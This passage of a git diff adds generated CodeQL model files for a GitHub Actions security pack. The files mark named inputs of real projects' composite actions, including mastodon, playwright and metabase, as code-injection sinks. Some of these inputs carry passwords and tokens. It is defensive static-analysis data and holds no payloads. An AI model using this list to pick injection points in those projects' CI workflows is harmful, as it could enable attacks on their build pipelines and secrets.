+ data: + - ["macvim-dev/macvim", "*", "inputs.contents", "code-injection", "generated"] + - ["macvim-dev/macvim", "*", "inputs.formula", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml new file mode 100644 index 000000000000..8513c7da64d3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mamba-org/mamba", "*", "inputs.key_suffix", "code-injection", "generated"] + - ["mamba-org/mamba", "*", "inputs.key_base", "code-injection", "generated"] + - ["mamba-org/mamba", "*", "inputs.key_prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml new file mode 100644 index 000000000000..a4ab8f025d07 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml @@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["maplibre/maplibre-native", "*", "inputs.artifact-name", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.externalData", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.testSpecArn", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.testFilter", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.testType", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.AWS_DEVICE_FARM_DEVICE_POOL_ARN", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.AWS_DEVICE_FARM_PROJECT_ARN", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.testFile", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.appFile", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.testPackageType", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.appType", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml new file mode 100644 index 000000000000..7d82b2d3e9e7 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mastodon/mastodon", "*", "inputs.additional-system-dependencies", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml new file mode 100644 index 000000000000..e466e17ddb41 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mavlink/qgroundcontrol", "*", "inputs.aws_secret_access_key", "code-injection", "generated"] + - ["mavlink/qgroundcontrol", "*", "inputs.aws_key_id", "code-injection", "generated"] + - ["mavlink/qgroundcontrol", "*", "inputs.artifact_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml new file mode 100644 index 000000000000..53881157a232 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mdanalysis/mdanalysis", "*", "inputs.extra-pip-deps", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "inputs.full-deps", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "inputs.micromamba", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "inputs.mamba", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "inputs.extra-conda-deps", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "inputs.isolation", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "inputs.build-docs", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "inputs.build-tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml new file mode 100644 index 000000000000..5ee6e863db68 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["medic/cht-core", "*", "inputs.hostname", "code-injection", "generated"] + - ["medic/cht-core", "*", "inputs.password", "code-injection", "generated"] + - ["medic/cht-core", "*", "inputs.username", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml new file mode 100644 index 000000000000..3f5a3b658c3e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["medusajs/medusa", "*", "inputs.pathToSeedData", "code-injection", "generated"] + - ["medusajs/medusa", "*", "inputs.password", "code-injection", "generated"] + - ["medusajs/medusa", "*", "inputs.email", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml new file mode 100644 index 000000000000..f5c13431126c --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml @@ -0,0 +1,17 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["metabase/metabase", "*", "inputs.organization_name", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.github_token", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.username", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.test-args", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.clojure-version", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.include-log", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.message", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.mysql", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.postgres", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.openldap", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.maildev", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.edition", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml new file mode 100644 index 000000000000..4788f44e856a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["metamask/action-create-release-pr", "*", "inputs.artifacts-path", "code-injection", "generated"] + - ["metamask/action-create-release-pr", "*", "inputs.created-pr-status", "code-injection", "generated"] + - ["metamask/action-create-release-pr", "*", "inputs.release-branch-prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml new file mode 100644 index 000000000000..7c66229c1746 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["metamask/action-npm-publish", "*", "inputs.subteam", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml new file mode 100644 index 000000000000..9eb3bdcf5ebb --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/fluentui", "*", "inputs.workspaces", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml new file mode 100644 index 000000000000..0db95acd5cd2 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/playwright", "*", "inputs.report_dir", "code-injection", "generated"] + - ["microsoft/playwright", "*", "inputs.connection_string", "code-injection", "generated"] + - ["microsoft/playwright", "*", "inputs.blob_prefix", "code-injection", "generated"] + - ["microsoft/playwright", "*", "inputs.output_dir", "code-injection", "generated"] + - ["microsoft/playwright", "*", "inputs.path", "code-injection", "generated"] + - ["microsoft/playwright", "*", "inputs.namePrefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml new file mode 100644 index 000000000000..785384aa2073 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["microsoft/wsl", "*", "inputs.comment", "code-injection", "generated"] + - ["microsoft/wsl", "*", "inputs.similar_issues_text", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml new file mode 100644 index 000000000000..24c4fb4bc707 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["milvus-io/milvus", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml new file mode 100644 index 000000000000..72575eb73684 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mlflow/mlflow", "*", "inputs.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml new file mode 100644 index 000000000000..b2b49fbba09c --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["modin-project/modin", "*", "inputs.parallel", "code-injection", "generated"] + - ["modin-project/modin", "*", "inputs.runner", "code-injection", "generated"] + - ["modin-project/modin", "*", "inputs.activate-environment", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml new file mode 100644 index 000000000000..6755f0d773ce --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mozilla/addons-server", "*", "inputs.run", "code-injection", "generated"] + - ["mozilla/addons-server", "*", "inputs.push", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml new file mode 100644 index 000000000000..1b55ab2d5490 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mozilla/bedrock", "*", "inputs.", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml new file mode 100644 index 000000000000..84401828721d --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mozilla/sccache", "*", "inputs.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml new file mode 100644 index 000000000000..35804a87f055 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["msys2/setup-msys2", "*", "inputs.systems", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml new file mode 100644 index 000000000000..981fe0fd3485 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mumble-voip/mumble", "*", "inputs.arch", "code-injection", "generated"] + - ["mumble-voip/mumble", "*", "inputs.type", "code-injection", "generated"] + - ["mumble-voip/mumble", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml new file mode 100644 index 000000000000..6c984a676d06 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nasa/fprime", "*", "inputs.location", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml new file mode 100644 index 000000000000..1138d37fb5fa --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nats-io/nats-server", "*", "inputs.label", "code-injection", "generated"] + - ["nats-io/nats-server", "*", "inputs.hub_password", "code-injection", "generated"] + - ["nats-io/nats-server", "*", "inputs.hub_username", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml new file mode 100644 index 000000000000..1418299b39ab --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nearform-actions/optic-release-automation-action", "*", "inputs.build-command", "code-injection", "generated"] + - ["nearform-actions/optic-release-automation-action", "*", "inputs.actor-name", "code-injection", "generated"] + - ["nearform-actions/optic-release-automation-action", "*", "inputs.actor-email", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml new file mode 100644 index 000000000000..fb67f66ce62c --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nektos/act", "*", "inputs.test_input_optional", "code-injection", "generated"] + - ["nektos/act", "*", "inputs.composite-input", "code-injection", "generated"] + - ["nektos/act", "*", "inputs.some", "code-injection", "generated"] + - ["nektos/act", "*", "inputs.test_input_required_with_default_overriden", "code-injection", "generated"] + - ["nektos/act", "*", "inputs.test_input_required_with_default", "code-injection", "generated"] + - ["nektos/act", "*", "inputs.test_input_optional_with_default_overriden", "code-injection", "generated"] + - ["nektos/act", "*", "inputs.test_input_required", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml new file mode 100644 index 000000000000..12aa48431db9 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["neo4j-contrib/neo4j-apoc-procedures", "*", "inputs.project-name", "code-injection", "generated"] + - ["neo4j-contrib/neo4j-apoc-procedures", "*", "inputs.gradle-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml new file mode 100644 index 000000000000..336af4b814b3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["neondatabase/neon", "*", "inputs.save_perf_report", "code-injection", "generated"] + - ["neondatabase/neon", "*", "inputs.real_s3_region", "code-injection", "generated"] + - ["neondatabase/neon", "*", "inputs.real_s3_bucket", "code-injection", "generated"] + - ["neondatabase/neon", "*", "inputs.run_with_real_s3", "code-injection", "generated"] + - ["neondatabase/neon", "*", "inputs.run_in_parallel", "code-injection", "generated"] + - ["neondatabase/neon", "*", "inputs.extra_params", "code-injection", "generated"] + - ["neondatabase/neon", "*", "inputs.test_selection", "code-injection", "generated"] + - ["neondatabase/neon", "*", "inputs.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml new file mode 100644 index 000000000000..8d2170c47e29 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["neovim/neovim", "*", "inputs.install_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml new file mode 100644 index 000000000000..854601e3ddeb --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nhost/nhost", "*", "inputs.config", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml new file mode 100644 index 000000000000..8a6074b87963 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nix-community/nixos-wsl", "*", "inputs.filename", "code-injection", "generated"] + - ["nix-community/nixos-wsl", "*", "inputs.expression", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml new file mode 100644 index 000000000000..f305e2a37b34 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["novuhq/novu", "*", "inputs.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml new file mode 100644 index 000000000000..042ca09efa62 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["nymtech/nym", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml new file mode 100644 index 000000000000..51d4903fbb10 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml @@ -0,0 +1,19 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["obsproject/obs-studio", "*", "inputs.failCondition", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.checkGlob", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.playtestBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.steamPassword", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.steamUser", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.preview", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.stableBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.betaBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.nightlyBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.tagName", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.customLink", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.customTitle", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.urlPrefix", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "inputs.sparklePrivateKey", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml new file mode 100644 index 000000000000..12dc3005260e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ocaml/dune", "*", "inputs.OCAML_COMPILER", "code-injection", "generated"] + - ["ocaml/dune", "*", "inputs.DKML_COMPILER", "code-injection", "generated"] + - ["ocaml/dune", "*", "inputs.DISKUV_OPAM_REPOSITORY", "code-injection", "generated"] + - ["ocaml/dune", "*", "inputs.CONF_DKML_CROSS_TOOLCHAIN", "code-injection", "generated"] + - ["ocaml/dune", "*", "inputs.FDOPEN_OPAMEXE_BOOTSTRAP", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml new file mode 100644 index 000000000000..dfe3b7f43329 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["oneflow-inc/oneflow", "*", "inputs.extra_flags", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "inputs.python_version", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "inputs.cuda_version", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "inputs.tmp_dir", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "inputs.dst_host", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "inputs.dst_path", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "inputs.src_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml new file mode 100644 index 000000000000..663fada6df9a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-telemetry/opentelemetry-ruby-contrib", "*", "inputs.gem", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-ruby-contrib", "*", "inputs.latest", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-ruby-contrib", "*", "inputs.ruby", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml new file mode 100644 index 000000000000..4a53345e6e5a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-telemetry/opentelemetry-ruby", "*", "inputs.gem", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-ruby", "*", "inputs.ruby", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml new file mode 100644 index 000000000000..0a18189242de --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["open-watcom/open-watcom-v2", "*", "inputs.fullname", "code-injection", "generated"] + - ["open-watcom/open-watcom-v2", "*", "inputs.buildcmd", "code-injection", "generated"] + - ["open-watcom/open-watcom-v2", "*", "inputs.artifact", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml new file mode 100644 index 000000000000..93ec3ea468de --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openapitools/openapi-generator", "*", "inputs.args", "code-injection", "generated"] + - ["openapitools/openapi-generator", "*", "inputs.name", "code-injection", "generated"] + - ["openapitools/openapi-generator", "*", "inputs.goal", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml new file mode 100644 index 000000000000..27f5af98f89a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["openjdk/jdk", "*", "inputs.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml new file mode 100644 index 000000000000..125dd8324d21 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["opensearch-project/opensearch-net", "*", "inputs.version", "code-injection", "generated"] + - ["opensearch-project/opensearch-net", "*", "inputs.build_script", "code-injection", "generated"] + - ["opensearch-project/opensearch-net", "*", "inputs.plugins_output_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml new file mode 100644 index 000000000000..dfa24454444e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["opensearch-project/security", "*", "inputs.plugin-branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml new file mode 100644 index 000000000000..9469e745ffcc --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["opentrons/opentrons", "*", "inputs.destPrefix", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "inputs.domain", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "inputs.distPath", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "inputs.project", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "inputs.python-version", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "inputs.repository_url", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "inputs.password", "code-injection", "generated"] \ No newline at end of file diff --git 